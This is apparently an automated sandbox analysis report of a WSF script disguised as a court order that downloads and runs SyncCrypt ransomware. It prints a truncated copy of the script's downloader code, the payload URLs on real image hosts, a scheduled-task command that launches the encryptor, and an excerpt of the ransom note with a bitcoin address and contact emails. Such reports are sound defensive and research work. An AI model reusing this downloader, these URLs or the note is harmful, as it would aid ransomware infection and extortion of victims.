Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	348744
Start time:	11:20:02
Joe Sandbox Product:	Cloud
Start date:	23.08.2017
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CourtOrder_845493809.wsf
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled JavaScript Instrumentation enabled
Detection:	MAL
Classification:	mal96.evad.rans.winWSF@16/7@4/4
HCA Information:	Successful, ratio: 90% Number of executed functions: 11 Number of non-executed functions: 110
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Sleeps bigger than 20000ms are automatically reduced to 500ms Found application associated with file extension: .wsf
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, WmiApSrv.exe, taskeng.exe, conhost.exe, dllhost.exe Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	96	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg

virustotal: 18/58 detections: Emsisoft: Trojan.Ransom.BTF (B), MicroWorld-eScan: Trojan.Ransom.BTF, McAfee-GW-Edition: SyncCrypt!Zip, GData: Trojan.Ransom.BTF, Sophos: Troj/SyncCt-A, McAfee: SyncCrypt!Zip, TrendMicro: TROJ_RANSOMNOTE.AUSTYV, Cyren: JPG/SyncCrypt.A, Symantec: Trojan.Randsom.A, BitDefender: Trojan.Ransom.BTF, TrendMicro-HouseCall: TROJ_RANSOMNOTE.AUSTYV, Arcabit: Trojan.Ransom.BTF, ViRobot: JPG.S.SyncCrypt.1040099, Ikarus: Trojan.Ransom, DrWeb: Trojan.Encoder.13697, Ad-Aware: Trojan.Ransom.BTF, AhnLab-V3: BinImage/Synccrypt, F-Secure: Trojan.Ransom.BTF

Perma Link

Antivirus detection for submitted file

Show sources

Source: CourtOrder_845493809.wsf

virustotal: 36/58 detections Avast: Other:Malware-gen [Trj], AVG: Other:Malware-gen [Trj], AegisLab: Troj.Script.Agent!c, Qihoo-360: Trojan.Generic, BitDefender: Trojan.Agent.CLKF, Emsisoft: Trojan.Agent.CLKF (B), MicroWorld-eScan: Trojan.Agent.CLKF, McAfee-GW-Edition: JS/Nemucod.xo, Fortinet: JS/Agent.SU!tr, GData: Script.Trojan-Downloader.SyncCrypt.A, Sophos: Mal/Psyme-A, McAfee: JS/Nemucod.xo, TrendMicro: JS_NEMUCOD.ELDSAUJG, Cyren: JS/Agent.SU!Eldorado, Symantec: JS.Downloader, Tencent: Js.Trojan.Raas.Auto, Panda: JS/Downloader.BRW, ZoneAlarm: HEUR:Trojan.Script.Agent.gen, TheHacker: VBS/Psyme, Rising: Trojan.Locky/JS!1.A549 (cloud:pT6AWwtp6PR), F-Prot: JS/Agent.SU!Eldorado, nProtect: Script-JS/W32.SyncCrypt-Downloader, CAT-QuickHeal: JS.Nemucod.EGL, ALYac: Trojan.Downloader.WSF.Agent, NANO-Antivirus: Trojan.Script.Heuristic-js.iacgm, Ad-Aware: Trojan.Agent.CLKF, AhnLab-V3: JS/Downloader, TrendMicro-HouseCall: JS_NEMUCOD.ELDSAUJG, Arcabit: Trojan.Agent.CLKF, Microsoft: TrojanDownloader:JS/Telicodeq.A, ViRobot: WSF.S.D

Perma Link

Cryptography:

Public key (encryption) found

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO	5_2_00401630
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO	5_2_00405600
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO	5_1_00401630
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO	5_1_00405600
Source: sync.exe	Binary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdA UL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4 ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhU YQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO

Spam, unwanted Advertisements and Ransom Demands:

Writes a notice file (html or txt) to demand a ransom

Show sources

Source: C:\Windows\System32\wscript.exe

File dropped: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.html -> decryption sofware requires that you send exactly the ammount of bitcoin (without the transaction fee) that is written within the text file to the following address: <ul><li>15lk2bqxj2mjgzz3kcui3b4c42cqkkmqzk</li></ul> note that if the ammount sent doesn't match exactly the ammount in the text file, you will not receive the sofware, as it's the only way to validate and confirm the payment. <li>after the payment is done, send an email to all of the following addresses <a href="mailto:getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com">getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com</a> containg:</li><ul><li>the file named key, located within the readme folder on your desktop, as an attachment - this file is a locked version of the decryption key (that must be unlocked by us), used to recover your files. do not delete it if

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 4x nop then sub esp, 1Ch	5_2_004E6ED0
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_0045BED7
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 4x nop then sub esp, 1Ch	5_1_004E6ED0
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_1_0045BED7

Networking:

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /X8IOl.jpg HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: curl/7.51.0Host: sm.uploads.im
Source: global traffic	HTTP traffic detected: GET /mxRqXF/arrival.jpg HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: curl/7.51.0Host: image.ibb.co

Found strings which match to known social media urls

Show sources

Source: wscript.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: image.ibb.co

Urls found in memory or binary data

Show sources

Source: wscript.exe	String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipe
Source: wscript.exe	String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipu
Source: wscript.exe	String found in binary or memory: file:///c:/users/user/desktop/courtorder_845493809.wsf
Source: wscript.exe, CourtOrder_845493809.wsf	String found in binary or memory: http://185.10.202.115/images/arrival.jpg
Source: wscript.exe	String found in binary or memory: http://185.10.202.115/images/arrival.jpgo
Source: wscript.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: wscript.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: wscript.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: wscript.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: wscript.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: wscript.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: sync.exe	String found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: wscript.exe, CourtOrder_845493809.wsf	String found in binary or memory: http://sm.uploads.im/x8iol.jpg
Source: wscript.exe	String found in binary or memory: http://uploads.im/
Source: wscript.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sync.exe	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: sync.exe	String found in binary or memory: http://www.openssl.org/support/faq.htmlrand
Source: wscript.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: wscript.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: wscript.exe	String found in binary or memory: http://www.usertrust.com1
Source: wscript.exe	String found in binary or memory: https://ibb.co/
Source: wscript.exe, CourtOrder_845493809.wsf	String found in binary or memory: https://image.ibb.co/mxrqxf/arrival.jpg
Source: wscript.exe	String found in binary or memory: https://secure.comodo.com/cps0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443

Potential malicious VBS script found (has network functionality)

Show sources

Source:	Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t\|\|(t="."),r.FolderExists(t)\|\|r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source:	Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t\|\|(t="."),r.FolderExists(t)\|\|r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source:	Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t\|\|(t="."),r.FolderExists(t)\|\|r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00

Stealing of Sensitive Information:

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Show sources

Source: C:\Windows\System32\cmd.exe

Directory queried: number of queries: 1045

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\sync.exe

Installs new ROOT certificates

Show sources

Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,

5_2_00401500

PE file contains sections with non-standard names

Show sources

Source: sync.exe.0.dr

Static PE information: section name: .eh_fram

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00404A24 push eax; mov dword ptr [esp], 00000000h	5_2_00404A3C
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_0057150F push ecx; mov dword ptr [esp], ebx	5_2_00571549
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00401630 push eax; mov dword ptr [esp], 00000BB8h	5_2_004016AB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00401630 push eax; mov dword ptr [esp], ebx	5_2_004016B9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00535FC0 push eax; mov dword ptr [esp], ebx	5_2_005361C2
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00536D40 push eax; mov dword ptr [esp], ebx	5_2_0053703F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00537310 push eax; mov dword ptr [esp], ebx	5_2_0053760F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_004E42D0 push eax; mov dword ptr [esp], esi	5_2_004E4345
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00404A24 push eax; mov dword ptr [esp], 00000000h	5_1_00404A3C
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_0057150F push ecx; mov dword ptr [esp], ebx	5_1_00571549
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00401630 push eax; mov dword ptr [esp], 00000BB8h	5_1_004016AB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00401630 push eax; mov dword ptr [esp], ebx	5_1_004016B9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00535FC0 push eax; mov dword ptr [esp], ebx	5_1_005361C2
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00536D40 push eax; mov dword ptr [esp], ebx	5_1_0053703F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00537310 push eax; mov dword ptr [esp], ebx	5_1_0053760F

Spreading:

Contains functionality to query local drives

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system,

5_2_00401630

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Show sources

Source: C:\Windows\System32\cmd.exe

Directory queried: number of queries: 1045

System Summary:

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Classification label

Show sources

Source: classification engine

Classification label: mal96.evad.rans.winWSF@16/7@4/4

Creates files inside the user directory

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

File created: C:\Users\user\desktop\README\

Creates temporary files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg

Found command line output

Show sources

Source: C:\Windows\System32\schtasks.exe	Console Write: ........a..u..0.............t...............................`.N...8...:...:.....P.#...N.........d.#..........WgZ..#.G..v
Source: C:\Windows\System32\cmd.exe	Console Write: ........n#.......... . . . . . . . .1. .f.i.l.e.(.s.). .m.o.v.e.d.......V..J ...........p..........uD...4...`.....,.....
Source: C:\Windows\System32\cmd.exe	Console Write: ........n#.......... . . . . . . . .1. .f.i.l.e.(.s.). .m.o.v.e.d.......V.DJt.!...........!........u..!.4...`.....,.....

Reads ini files

Show sources

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: CourtOrder_845493809.wsf

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf'
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Source: unknown	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c net view
Source: unknown	Process created: C:\Windows\System32\net.exe net view
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00413910 appears 113 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00414410 appears 267 times
